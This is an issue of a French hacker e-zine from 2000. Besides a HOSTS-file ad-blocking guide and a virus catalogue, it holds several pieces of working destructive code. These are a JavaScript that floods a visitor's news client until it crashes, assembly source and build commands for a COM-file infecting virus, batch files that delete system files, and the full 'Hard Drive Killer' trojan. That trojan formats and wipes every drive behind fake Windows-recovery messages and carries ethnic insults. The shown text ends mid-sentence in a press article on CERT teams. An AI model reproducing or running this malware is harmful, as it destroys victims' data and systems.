05.03.2000              - H@CKOFF No21 - * GaZoBuMeu edition * - 

  
,,`,,`,,``,,`,,`,,
   
         _/    _/    _/_/      _/_/_/  _/    _/    _/_/    _/_/_/_/ _/_/_/_/      
        _/    _/  _/    _/  _/        _/  _/    _/    _/  _/       _/
       _/_/_/_/  _/_/_/_/  _/        _/_/      _/    _/  _/_/_/   _/_/_/
      _/    _/  _/    _/  _/        _/  _/    _/    _/  _/        /
     _/    _/  _/    _/    _/_/_/  _/    _/    _/_/    _/       _/   
 
`,,`,,`,,``,,`,,`,,

   
    _________________________________________________________________________
   /                                                                         \
  /   Bienvenue dans ce Hackoff No 21 pompante edition (enore au rythme de    |
 /  la savate pour changer). Au sommaire de ce numero 21 on vous enumere nos /
| lucubrations fantasmo-selectives a ambiance parano-evolutoires, avec en  /
 \ prime un vieux cadavre littraire a peine exhum de son temple...       /
  \_______________________________________  ______________________________/
                                          \ |
                                           \|   
                                       __________                             
                                   .,:;>The Crew<;:,.                         
                                      /  .Silk.  \           
                                     /  .Cakeii.  \
____________________________________/  ..Tobozo..  \_____________________________
 -桢 /  ...Yopyop...  \-桢
/  .....Clad.....  \
    		                 /  .....Blured.....  \
                                /  ......Misto!......  \
                               /  ...Natural Killer...  \
                    ----8<----+-----8<--------8<---------\-8<--+-------8<---
                             / Guest :Hack_Evangile*Gard* \
                            /------------------------------\ 

                   ____________________________________________________________ 
 __________       /   TabLe des mAtires :                                     \
/ HACK0ff  \     ||
]-=v0L 21=-[     |     [1]Disclaimer                          Tobozo            |
\Mars  2000/     |     [2]Le javascript pour rigoler          Shodan            |
		 |     [3]Cookiller (suite)                   Tobozo            |
                 |     [4]VirusMania                          Clad_strife       |
                 |     [5]Les Mot-cles Echelon                Privassis         |
                 |     [6]Un coup Fumant                      Les Artificiers   |
---------8<------+--------------8<---------------------8<---------------------8<-
                 
                 : 
                 . 






                     _        _______________________        _
-*1*-                 `^*;:,.>   $     M   <.,:;*^`
_____________________________/By Tobozo\___________________________

`,,`,,`,,``,,`,,`,
Apres le gobage de flamby, l'insultage en direct sur IRC, le Nuke aleatoire, le
montrage de fesses sur NetMeeting, voici que nous revient en provenance directe
de la backbone atlantique une vague de perversion depassant de facon inquietante
tous les niveaux jusqu'ici suggrs. Non il ne s'agit pas d'une nouvelle marque
de cigares parfums ni d'un nouvel pisode des Simpsons, et la dcence la plus
lmentaire nous interdit d'en parler ici. Pour les memes raisons, il serait plus
sage que nous n'agissions pas sans rflchir aux consquences de nos actes.
Plus disclaime que moi tu meurs.
`,,`,,`,,``,,`,,`,








           _        ____________________________________________        _
-*2*-       `^*;:,.> Le javascript pour rigoler - by Shodan - <.,:;*^`
___________________/\_____________________


Ce javascript va rediriger le newgroup reader vers le lecteur C de la victime et
ajouter des groupes dans le client news jusqu'a ce que celui ci sature et plante.
Si le processus n'est pas interrompu par l'utilisateur, allez savoir ce qui peut
arriver... Greetz a Shodan pour ce script delamortkitue.


<html>
<!-- Scripting by Shodan - Savate System -->
<SCRIPT LANGUAGE = "JavaScript">
<!--//
var count=0
function play()
	{
	comp=count+1
	remote = window.open("", "remotewin", "width=0, height=0, toolbar=no, 
	location=no, directories=no, menubar=no, resizable=no, scrollbars=no, 
	status=no");
	remote.location.href = "news://" + count + comp 
	+"hacked:\\c:fbi.gov.office" + count;
	if (remote.opener == null) remote.opener = window; 
	remote.opener.name = "opener";
	type()
	}
function type()
	{
	if(count<=comp)
		{
		count++
		setTimeout("type()",1000)
		}
	else
		{
		play()
		}
	}
//--> 
</SCRIPT>
<body onload="play()">


-Shodan-

`,,`,,`,,``,,`,,`,







           _        _______________________________________        _
-*3*-       `^*;:,.>    Cookiller (suite) - by tobozo    <.,:;*^`
___________________/\_____________________

cookiller (la suite)

L'internet evolue d'une facon inattendue : la technique rencontre la politique, 
et ca fait pas bon menage...
W3c a decide de ne pas inclure de backdoor dans la prochaine version de tcp/ip. 
Pas dur a croire quand on voit quelles sont les traces laissees a chacun de nos 
clicks, il est evident qu'ils peuvent tres bien se passer de ce genre de systeme 
quand on vit a une epoque ou les agences de pubs sont mieux renseignees sur les
internautes que RG sur leurs propres effectifs...

A quoi bon mettre en place un systeme couteux qui sera rendu rapidement obsolete 
par le progres technologique et logiciel ? Et pourquoi ne pas plutot jouer avec 
les "failles" officiellement et hypocritement ignorees pour des raisons 
commerciales ?

Dans un article precedent (voir hackoff#20 => cookiller) nous vous parlions du 
cookie revelateur d'identit via les courriers visualiss en ligne. Dans cet 
article, nous allons voluer autour d'une description plus pratique en donnant 
des exemples tout aussi pratiques. 

L'exemple le plus flagrant en matiere de recensement (et c'est de loin le plus
representatif) est celui de doubleclick : un archtype de la russite dans 
l'e-commerce. Ils sont presents partout et occupent par consequent une 
position predominante sur le march de l'affichage publicitaire. Ne soyez donc 
pas surpris de decouvrir des requetes vers un de leurs serveurs lors de 
l'ouverture d'un SPAM ou de la visite d'un site a forte frequentation. 

Etant donne qu'ils couvrent la majorite de ces types de sites, qu'ils recoupent
plusieurs resultats de statistiques pouvant provenir de divers pages web, 
d'emails, de newsgroups (etc..), ils peuvent se permettre d'entretenir une base
de donnees utilisateurs qui contiendrait des informations sur plus de la moitie
des internautes de la planete.
D'ailleurs 100% des islandais sont fichs de A a Z....
Meme la NSA n'en est pas a la moiti de ca.

Tout politicien sait qu'il est impossible de satisfaire 100% des electeurs, et 
par consquent qu'il y aura toujours des malheureux. 
Suivant le meme ordre de selection, les internautes se classent eux-meme par 
un plebiscite qui se joue a coup de clicks. Une pub par ci, un pop-up par la, 
et on fait avancer la machine a fric infernale, du meme coup on scie la branche
sur laquelle on est assis, et on rejoue une vieille scene commune a tous les
films americains qui nous servent des victimes qui sont toujours innocentes et
immacules avant de leur faire subir les derniers outrages des relents de 
leurs propres psychoses. La verit est ailleurs et ce n'est pas un X-File, 
c'est le fichier HOSTS.

Ce fichier peut etre present en plusieurs endroits selon les systemes. 
Nunux : 	/etc/HOSTS
NT4/5 : 	C:\winnt\system32\drivers\etc\HOSTS
Windoze 95/98 :	c:\windows (il faudra probablement le creer et le placer
		dans ce repertoire)

Le but de la manoeuvre est d'editer ce fichier et d'y ajouter au choix
une ou plusieurs des lignes suivantes : 

127.0.0.1	ad.doubleclick.net
127.0.0.1	ad.fr.doubleclick.net
127.0.0.1	xb.xoom.com
127.0.0.1	www.multimania.fr
127.0.0.1	a32.g.a.yimg.com
127.0.0.1	images.go2net.com
127.0.0.1	click.go2net.com
127.0.0.1	adforce.imgis.com
127.0.0.1	ad.caramail.com
127.0.0.1	pub.chez.com
127.0.0.1	comtrack.comclick.com

Sur deux machines identiquement reglees, dont une ayant le fichier hosts
modifie, la difference de traffic genere en visitant les memes sites (alta-
vista, yahoo, microsoft, tripod, xoom, etc) est proche de 15% !!
Amis surfeurs, ne negligeons pas l'importance d'un tel confort. 15% de 
traffic, c'est 15% de votre temps, 15% de votre facture telephonique, 
15% de votre abonnement internet (meme si 15% de 0.00f ca fait toujours
0.00f), et enfin 15% de votre bande passante. 
A defaut se se faire rembourser de ce racket, on peut deja commencer a les
soulager d'une partie de leurs statistiques en appliquant allegrement un 
article sur la libert informatique et le droit a la vie prive : charit
bien ordonne commencant par soi-meme, nos stats nous intressent.

Note : si votre machine est equipee d'un serveur web qui est peu sollicit,
c'est une bonne ide d'activer l'error log, rien que pour estimer a combien
de requetes par heure se monte la moyenne de traffic publicitaire genr
par le browser. 

Tobozo

`,,`,,`,,``,,`,,`,






           _        _______________________________________        _
-*4*-       `^*;:,.>    VirusMania  -by Clad_strife-     <.,:;*^`
___________________/\_____________________

Virus

J'ai dress une liste de quelques virus dont il est important de connaitre les
fonctionnalits.

* Armagedon: ce virus utilise vos ports locaux COM pour appeler un service local
d'information en Grece, ne marche qu'avec des modems exploitant la ligne
tlphonique.
* Melissa: marche avec Word97, ce virus en .doc s'auto-envoye aux gens dont les
adresses e-mails apparaissent dans MS Outlook address book. Ouvert avec Word
2000 il rduit les paramtres de scurit au minimum.
* Yankee 44 A/B: ce programme infecte tout les .exe et .com quand ceux-ci
tournent
* Vascina TP 33: ce programme infecte les .exe et .com, si il trouve une version
de lui plus ancienne que l'actuelle, il l'update par lui-mme (nouvelle version)
* Tolbuhin 992/1004: ce virus infecte les fichiers .com, de plus le PC rame
quand le virus essaye d'infecter un fichier.
* Tequila: aprs sa premire infection sur le disque-dur, il n'infecte que les 4
premiers mois, aprs quoi tout les 4 mois de l'infection il affiche un message
d'anniversaire.
* Possessed 2443: aprs que le virus soit actif pour 15  20 minutes, tout
programme qui tourne sera effac. Quand aux fichiers infects (.exe et .com) il
contiendront le mot "POSSESSED!"
* PM trojan (OCX): ce programme remplace les fichiers PWL et de passwords ICQ de
l'utilisateur du systme: un animation apparait pour faire comme si rien de
spcial n'arrive.
* Omega: quand le virus est activ un Vendredi 13, le symbole omega apparait et
le disque-dur est rcrit.
* Nuke Marauder 860: tous les 2 fvrier ce virus crit sur les fichiers .com la
commande INT 20h (retour  DOS).
* MSK 284/293: inefecte TOUS les .exe et .com dans le rpertoire o il se trouve
et peut corrompre le C:
* Keypress: je vous avais donn le code source plus haut, ce virus s'active
toutes les 30 minutes.
* Hymn Hymn: quand le mois et le jour sont identiques (ex: 12/12) le virus
dtruit les secteurs boot du HD, joue de la musique, et affiche un message.
* Anti-Pascal 605: le virus change la date et l'heure d'un programme infect. De
plus il efface tous les fichiers .bak et .pas.

Remarque: il est vident que cette partie est incomplte, pour preuve: ceci ne
sont des dtails que sur les 750 virus que j'ai en banque de donne. Il sort en
moyenne 100 virus par mois, donc cette liste ne sert qu' vous donnez un aspect
global des fonctionnalits des diffrents virus.

Les diffrents types de virus:

Ca sert  rien de rpter ce qui est dj dit, mais un article sur les virus
sans a, c'est dommage.
- Virus de fichier, ou virus  action directe:

Ces virus ajoutent leur code  celui de fichiers executables (avec l'extension
.EXE, .COM, .SYS, etc)

-Virus rsidents:
Ces virus se chargent en mmoire centrale et, de l, contaminent d'autres
programmes.

- Virus du secteur d'amorce des disques:
Ces virus remplace l'amorce d'un disque par leur propre code, dplacant cette
amorce sur le disque et se chargent ensuite en premier en mmoire centrale, ds
les premiers accs aux disques.
De l, il rendent inutilisable le disque d'amorage ou se propagent  d'autre
disque o ils commettent alors leurs Payload. (en englais action /mfait)
-Virus furtifs:
Voici une catgories de virus qui chappe  toutes dtection en se camouflant.
Il faut savoir qu'une mthode de dtection classique des virus triviaux consiste
 enregistrer la longeur d'un programme. L'orsque un virus frappe ce dernier, il
ajoute son propre code ce qui par consqunt accrot la taille du fichier
infect.
Or, un virus furtif, lui, s'arrange pour qu'on lise toujours la mme longeur
pour le fichieer contamin. Si vous lancez un Dir (sous Dos) par exemple, le
virus dtourne cette demande, effectue un petit calcul et hop! affiche la taille
initial du fichier non contamin. (pas con la petite bte ! ..)
- Virus crypts:
Les virus crypts sont encore plus vicieux. Ils modifie leur popre code par
cryptage (XOR en assembleur pour les connaisseurs).
Il existe des multitudes de moteur de cryptage dont le plus connus est le MTE
(Mutation Engine) de Dark Avenger.
- Virus polymorphe ou mutant:
Ces derniers sont encore plus malin car ils modifient leurs propre signature 
chaque contamination. En effet, il faut savoir que les Anti-Virus recherche en
priorit les signatures des virus, c'est  dire les chanes de caractres qui
lui sont propres. Et l, hh ils sont pas dans la merde moi je vous le dis.
- Virus piges:
Le virus pige associe un virus connu  un virus encore inconnu. Vous dtectez
le premier et, tout happy vous l'liminez en le dtruisant, mais le secon lui
subsiste. (Nice shot !)
- Rtrovirus:
Le rtrovirus est un virus spcialement cr pour contrer et djouer les
fonctions d'un logiciel antivirus donn. Connaissant le mode d'action de cet
antivirus, il le contre et djoue ses piges.

Pourquoi code-t-on les virus en assembleur:

L'asm est l'abbrviation de "assembleur". Les fichiers programms en assembleur
et non compils sont de type .asm., une fois compils ils prennent la forme d'un
.exe. Si les virus sont programms en assembleur c'est parce que l'assembleur
est le language machine, et qu' partir du moment o un programme est programm
en assembleur il peut TOUT faire sur le systme d'exploitation.
Porgrammer en assembleur requiert donc de:
- connaitre le systme d'exploitation
- connaitre ce language de programmation
Autre avantage de l'assembleur, c'est que les programmes fait en assembleur sont
assez petits (quelques ko), ce qui peut cependant voquer une certaine mfiance.

En quoi Linux/UNIX est "immunis" contre les virus:

Linux a deux caractristiques qu'il faut retenir:
Excution en mode protg sur les processeurs x86. Protection de la mmoire
entre les processus, afin qu'un programme ne puisse  lui seul compromettre le
fonctionnement de l'ensemble du systme.
Donc mme si les virus ne peuvent pas se lancer, les mouchards (sniffers) le
peuvent.

Programmation de virus (par Syphillis [Beef13]):

Ce programme est tout simple : Il cherche les fichiers COM dans le rep courant
et les infecte en se copiant au tout debut du fichier.

Mais comment chercher des fichiers ?
En utilisant la fonction de l'API DOS approprie. Comment la connaitre ? En
lisant le truc sur les interrupt de DEF ou HELPPC ou la Bible PC.
Bon dans notre cas, il s'agit des fonctions 4Eh et 4Fh. Ces fonctions
correspondent aux fonctions C findfirst() et findnext() mais ici on n'a pas
de ffblk.
Il faut d'abord appeler la fonction 4Eh ( findfirst ) avec comme paramtre
en AH le numro de la fonc et en dx l'OFFSET sur une chaine ASCIIZ (qui finit
par un zero si t es trop con pour savoir ce que c'est ) avec le nom du fichier
 rechercher ( les caractres jokers sont accepts ).
En retour le CARRY FLAG est arm si y a pas de fichier. Si un fichier est
trouv plein de trucs sont mis dansl la DTA qui est toujours situe  partir
de l'OFFSET 80h du PSP. Le nom du fichier se trouve  L OFFSET 9Eh. Pour
rechercher un autre fichier, il suffit d'appeler la fonction 4Fh ( mov ah,4Fh)
puis int 21h).

Bon maintenant on sait chercher des fichiers. Mais comment s'en servir.
Souviens toi qu'on a le nom du fichier qu'on vient de trouver  l offset 9Eh,
au debut du segment dans le PSP ( Prefix Segment Program ou l inverse sais
plus).
Il va encore falloir se servir des fonctions de l'API DOS. Les utiles ici
sont au nombre de trois :
la 3Dh  : ouvrir un fichier  (Handle)
la 3Eh  : fermer un fichier  (Handle)
la 40h  : crire dans un fichier (Handle)
Dans le monde de DOS il existe 2 moyens de se servir des fichiers : le FCB
et les Handles. Nous utiliserons les Handle qui sont beaucoup plus pratique
dans cette situation.

pour ouvrir un fichier, il suffit de foutre en AH le numro de la fontion
(3Dh) en AL les attributs et en dx l'offset sur la chaine ASCIIZ du nom de
fichier puis un petit int 21h et le tour est jou. Cette fonction renvoie
le Handle du fichier en AX. Mais comme toutes les autres fonctions le veulent
en BX ou le foutra en BX toute suite grce  un xchg ax,bx.

Puis on crit dedans le virus au tout dbut du fichier. Etant donn qu'il
viens d'tre ouvert, il est au tout dbut et pas de soucis  avoir de ce ct
l. Pour ecrire fous en AH 40h, en Bx le Handle, en CX la taille et en DX
l'offset du buffer  crire. Dans notre cas l'offset est gal  100h
( fin du PSP et dbut du prog). La taille a t code directement mais
on aurait pu mettre un OFFSET machin avec un machin:  la fin du file
pour ke tout soit OK.

Reste  fermer le fichier avec la fonction 3Eh qui attends le handle en BX
et le tour et jou.
Voici maintenant le fichier. Grce ... queqlques astuces dans son organisation
j ai pu rduire sa taille au max.

-------------------------- Fichier IGA1.ASM  ---------------------------------

; Ce virus est un virus dbile !!!!!

.model small                        ;modele de mmoire
.code                              ;segment de code

        ORG     100h               ;un COM commence ... l adresse mmoire 100h

CON1:

        mov     ah,4Eh             ; Rechercher le premier COM du rpertoire
        mov     dx,OFFSET FILESPEC
        int     21h

INFECT:

        jc      FIN                ; si aucun -> FIN
        mov     ax,3D01h           ; un fichier a t trouv :
        mov     dx,9Eh             ; l'ouvrir
        int     21h

        xchg    ax,bx              ;Handle en BX

        mov     ah,40h             ;Ecrire le virus au dbut du fichier
        mov     cx,2Dh              ;Taille du virus
        mov     dx,100h
        int     21h

        mov     ah,3Eh             ;fermer le fichier
        int     21h

        mov     ah,4Fh             ;chercher fichier suivant
        int     21h
        jmp     INFECT

FIN:
        ret

        FILESPEC DB '*.COM',0 ; Doit finir par un zro !

        END IGA1

------------------------------- Fin du Fichier -------------------------------
Voil c'est tout !
Pour le compiler : tasm iga1
                   tlink /t iga1
et on a le fichier iga1.com
Si tu ne comprends pas ce code, passe ton chemin !

Si toi tester ce virus, il detruira tous les fichiers COM du rpertoire !
C'est un peu ennuyeux si on veux rester discret.

Un autre truc. Il ne marche pas avec les fichiers EXE. C normal, ceux ci
ayant un en-tte precis et pouvant faire plusieurs segment, ils sont plus
compliqus  infecter.

Remarque: je n'ai pas vrifi la vracit de ces faits, de plus au niveau de la
compilation du programme je pense qu'il vaut mieux rajouter ces quelques lignes
(Note de Clad Strife):
Le programme doit tre saisi dans un fichier texte non formatt (c'est--dire
sans caractres en gras, soulign, avec des polices de caractres de diffrentes
tailles, ...) appel fichier source. En effet, l'assembleur (le programme
permettant de faire la traduction du langage assembleur en langage machine)
permet uniquement de crer un fichier assembl  partir du fichier source (il
devra comporter l'extension .ASM, en s'appelant par exemple source.asm ou
n'importe quel autre nom suivi de l'extension .asm).
L'assembleur va fournir un fichier objet (dont l'extension est .obj) qui va
contenir l'ensemble des instructions traduites en instructions machines. Ce
fichier .OBJ ne pourra toutefois pas s'excuter directement car il faut encore
lier les diffrents fichiers.
Comment a les diffrents fichiers?
En effet il est possible de construire un excutable  partir de plusieurs
fichiers sources ( partir d'un certain niveau de programmation il devient
intressant de crer des fichiers contenant des fonctions...). Ainsi, mme si
vous avez un seul fichier objet il vous faudra utiliser un programme (appel
diteur de liens) qui va vous permettre de crer un fichier excutable (dont
l'extension sera .exe).
A quoi ressemble un fichier en assembleur:
Comme dans tout programme le fichier source doit tre saisi de manire
rigoureuse. Chaque dfinition et chaque instruction doivent ainsi s'crire sur
une nouvelle ligne (pour que l'assembleur puisse les diffrencier) Le fichier
source contient:
* Des dfinitions de donnes dclares par des directives (mots spciaux
interprts par l'assembleur, nous les tudierons plus tard, le but est ici de
donner une ide de ce  quoi ressemble un fichier source) Celles-ci sont
regroupes dans le segment de donnes dlimit par les directives SEGMENT et
ENDS
* Puis sont places les instructions (qui sont en quelques sorte le coeur du
programme), la premire devant tre prcde d'une tiquette, c'est--dire un
nom qu'on lui donne. Celles-ci sont regroupes dans le segment d'instructions
dlimit par les directives SEGMENT et ENDS
* Enfin le fichier doit tre termin par la directive END suivi du nom de
l'tiquette de la premire instruction (pour permettre au compilateur de
connatre la premire instruction  excuter
* (Les points-virgules marquent le dbut des commentaires, c'est--dire que tous
les caractres situs  droite d'un point virgule seront ignors)
Voici  quoi ressemble un fichier source (fichier .ASM):

donnees   	SEGMENT; voici le segment de donnes dont l'tiquette est
donnees

	;Placez ici les dclarations de donnes

donnees 	ENDS; ici se termine le segment de donnees



ASSUME DS:data, CS: code



instr	SEGMENT; voici le segment d'instructions dont l'etiquette est instr

	debut:		;placez ici votre premiere instruction (son etiquette
	est nomme debut)

			;Placez ici vos instructions

instr	ENDS; fin du segment d'instructions



END debut; fin du programme suivie de l'etiquette de la premiere instruction


la dclaration d'un segment
Comme nous le verrons plus loin <segmentation.htm>, les donnes sont regroupes
dans une zone de la mmoire appel segment de donnes, tandis que les
instructions se situent dans un segment d'instructions.
Le registre DS (Data Segment) contient le segment de donnes, tandis que le
registre CS (Code Segment) contient le segment d'instructions. C'est la
directive ASSUME qui permet d'indiquer  l'assembleur o se situe le segment de
donnes et le segment de code.
Puis il s'agit d'initialiser le segment de donnes:
MOV AX, nom_du_segment_de_donnees
MOV DS, AX

On va s'en arrter l pour la programmation en assembleur.

Bases de la programmation de .bat:

La cration de fichiers .bat est simple: il suffit de s'y connaitre un peu en
MS-DOS, et savoir taper sur son clavier. D'abord quelqes commandes de bases:
echo off : dsactive l'affichage de ce qui se passe
dir C:\WINDOWS : affiche le contenu de C:\WINDOWS
del C:\WINDOWS\*.exe : efface tous les fichiers .exe du C:\WINDOWS
echo. : saute une ligne
echo J'cris bien hein? : affiche ce qui est crit aprs [echo]
cls : efface l'cran
pause : demande d'appuyez sur une touche pour continuer
C:\WINDOWS\telnet.exe : xcute telnet
Donc voici le genre de fichiers .bat extrmement dangereux que vous pouvez
faire:
echo off
echo this programm is created by XXX all rights reserved
pause
del C:\WINDOWS\*.*
dir C:\WINDOWS\
echo t'es mort
cls
On peut aussi crer des menus d'options:
@echo off
:menu
cls
echo.
echo Menu d'options :
echo -----------------------
echo 1. Editer autoexec.bat
echo 2. Editer config.sys
echo.
echo Q. Quitter
echo.
choice /c:12Q /t:Q,60 /n Votre choix ?
if errorlevel 255 goto erreur
if errorlevel 3 goto Quitter
if errorlevel 2 goto EditConf
if errorlevel 1 goto EditAuto
if errorlevel 0 goto erreur
goto fin
:erreur
echo Il y a eu une erreur.
goto fin
:Quitter
goto fin
:EditConf
edit c:\config.sys
goto menu
:EditAuto
edit c:\autoexec.bat
goto menu
:fin
Si vous n'avez pas compris le passage sur la commande choice et errorlevel,
voil de quoi vous aider:
Aide sur CHOICE :
choice [/c:ON] [/t:X,nn] [/n] [Invite]
/c:ON Choix de lettres utilisables (ici O et N) (ON par dfaut)
/t:X,nn Choisira automatiquement option X aprs nn secondes. X doit faire parti
de la liste /c:
/n Interdit le respect de la casse
Invite Texte d'invite qui apparat
Errorlevel correspond au choix de l'utilisateur. c'est comme la variable de
rponse en Q-Basic.
Paramtre de la ligne de commande
@echo off
cls
echo.
echo Le prog est %0
echo.
echo Bonjour %1,
echo.
echo A plus, %2
Enregistrer sous "c:\test.bat" et taper sous dos :
c:\test.bat "votrenom" "unAutrenom"
%X correspond au Xime groupe de caractres sur la ligne de commande pour X=
{0;9}
Trs pratique pour faire un prog d'installation :
xcopy a:\*.* %1:\%2
Ici, %1 est la lettre de lecteur et %2 le dossier.
Virus en .bat:
L'article qui va suivre va faire une brve description d'un virus en .bat qui
est malheureusement dtect par AVP et Norton (synonyme de qualit donc), comme
trojan. Au sens littral du terme un trojan et un virus se diffrencie par trs
peu de choses: un virus s'inscrit partout sur un HD, un trojan non. Il existe 2
sortes de trojans:
- les trojans usuels (que vous connaissez et qui se foutent comme serveur sur
votre bcane)
- les trojans destructeurs (celui qui va suivre)
Voici le code source  copier dans un .txt et  renommer en .bat.
@echo off
rem This program is dedecated to a very special person that does not want to be
named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul

rem Drive checking and assigning the valid drives to the drive variable.

set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don't worry about
how it
rem works, it's damn to complicated for the average or even the expert batch
programmer.
rem Except for Tom Lavedas.

echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then it's true.
rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >
{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive -
not ready.
rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc >>drivechk.bat

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE
cHECKING".

rem Now we will use the program drivechk.bat to attain valid drive information.

:testdrv

for %%a in (%alldrive%) do call drivechk.bat %%a >nul

del drivechk.bat >nul

:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your
system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>
c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your
system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>
c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your
system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your
system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>
c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your
system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>
c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your
system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer
version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this
program is to tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted.
>>c:\autoexec.bat
echo echo 2. Love is important, if you have it, truly, don't let go of it like I
did! >>c:\autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad
your HD is dead. >>c:\autoexec.bat
echo echo 4. If you are Australian, I feel sorry for you, accept my sympathy,
you retard. >>c:\autoexec.bat
echo echo 5. Don't support the following: War, Racism, Drugs and the Liberal
Party.>>c:\autoexec.bat

echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat

:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do
%%%%a >>c:\temp.bat
echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>
c:\temp.bat
echo if not exist
%%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2
\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul
goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul

cls
echo Initializing Variables . . .
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file
created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a:\ /S  >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking
genius.
echo.
echo Here is a joke for you . . .
echo.
echo     Q). What's the worst thing about being an egg?
echo	 A). You only get laid once.
echo.
echo HAHAHAHA, get it? Don't you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga

:end

rem Hard Drive Killer Pro Version 4.0, enjoy!!!!

rem Author: Munga Bunga - from Australia, the land full of retarded Australian's
(help me get out of here).

Article de Libration sur les "pompiers du net":

   Quand le cble qui achemine les donnes de l'Internet vers l'Angleterre a
   vir au rouge sur l'cran de contrle, il a fallu ragir trs vite. Au
   dbut, on ne savait pas ce qui se passait, raconte David Crochemore. Sous
   ses yeux, il avait la cartographie des tuyaux qui composent Renater, le
   rseau informatique franais de l'enseignement et de la recherche. Quand un
   des liens passe au orange ou au rouge, c'est l'alerte. Simple souci technique
   ou attaque de pirate informatique?
Riposte. Ce jour d'octobre, un hacker tait pass par l: le cble qui relie
Renater  l'Angleterre tait presque satur, trs encombr par des donnes
envoyes en masse par le pirate malveillant. Coups de tlphone aux techniciens
prsents aux endroits stratgiques, interventions sur les ordinateurs. En
quelques heures, on a rgl le problme.
David Crochemore, avec sa moustache en guidon de vlo, est un pompier. Un soldat
du feu high-tech, responsable pour Renater du Cert (Computer Emergency Response
Team), le nom gnrique donn aux quipes de riposte en cas d'urgence
informatique. Partout dans le monde, des structures de ce type ont pour mission
de ragir aux attaques de pirates, aux virus et  tous les hoquets de scurit
